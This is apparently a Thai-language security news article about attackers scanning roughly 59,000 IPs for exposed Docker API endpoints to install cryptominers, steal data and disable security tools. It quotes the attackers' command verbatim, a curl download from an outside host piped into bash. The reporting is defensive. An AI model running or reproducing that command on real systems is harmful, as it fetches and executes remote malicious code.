พบแฮ็กเกอร์กำลังสแกนหา Docker ผ่านทางออนไลน์ไปแล้วถึง 59,000 ไอพี

Bad Packets ผู้เชี่ยวชาญด้านภัยคุกคามทางไซเบอร์ได้ออกมาเตือนถึงความพยามในการสแกนหา Docker เพื่อหา API Endpoint ที่ให้เข้าถึงจากออนไลน์ โดยมีการสแกนไปแล้วถึง 59,000 ไอพี

Credit: Andrey Popov/ShutterStock

เมื่อวันที่ 24 พฤศจิกายนที่ผ่านมาได้มีการค้นพบการสแกนเพื่อหาเหยื่อที่ใช้งาน Docker เพื่อค้นหา API Endpoint ที่สามารถใช้งานได้ผ่านทางออนไลน์ โดยแฮ็กเกอร์จะเข้าไปสั่งเริ่ม Alpine Linux Container ด้วยคำสั่งว่า “chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;” โดยท้ายที่สุดสคิร์ปต์ดังกล่าวจะไปเรียกติดตั้งตัวขุดเหมือง 

นอกจากนี้ผู้เชี่ยวชาญยังเผยว่าสคิร์ปต์ยังได้มีการสั่งปิดผลิตภัณฑ์ด้าน Security และสั่งปิดโปรเซส lso ซึ่งเป็นการกำจัดตัวขุดเหมือนอื่นๆ รวมถึงยังมีการลอบขโมยข้อมูลส่งกับไปหาเซิร์ฟเวอร์ด้วย ด้วยเหตุนี้เองเมื่อรู้เช่นนี้แล้วก็หมั่นตรวจสอบการใช้งานของเราเองด้วยนะครับว่ามีการเข้าถึงผ่านทางออนไลน์อย่างไร

ที่มา :  https://www.zdnet.com/article/a-hacking-group-is-hijacking-docker-systems-with-exposed-api-endpoints/

About nattakon

จบการศึกษา ปริญญาตรีและโท สาขาวิศวกรรมคอมพิวเตอร์ KMITL เคยทำงานด้าน Engineer/Presale ดูแลผลิตภัณฑ์ด้าน Network Security และ Public Cloud ในประเทศ ปัจจุบันเป็นนักเขียน Full-time ที่ TechTalkThai

Check Also

Tenable จับมือ Anthropic เข้าร่วม “Project Glasswing” ยกระดับการป้องกันไซเบอร์ในยุค AI [Guest Post]

การเข้าร่วม Project Glasswing และการได้ร่วมทำงานกับ Claude Mythos Preview ในครั้งนี้ จะช่วยให้ Tenable สามารถสนับสนุนลูกค้าให้เข้าใจพฤติกรรมของโมเดล AI ระดับแนวหน้า (Frontier AI) …

[Video] WatchGuard Webinar : Zero Trust Made Simple

ในอดีต การวางระบบ Zero Trust Architecture มักถูกมองว่าเป็น ‘ยาขม’ ของฝ่ายไอทีและองค์กรจำนวนมาก เพราะแนวคิดที่ต้อง ‘ไม่เชื่อใจใคร และต้องตรวจสอบเสมอ’ นั้น มักตามมาด้วยความซับซ้อนยุ่งเหยิงในการบริหารจัดการ ในงาน WatchGuard Webinar ครั้งนี้ท่านจะได้รับชมกับแนวทางที่ทำให้ Zero Trust …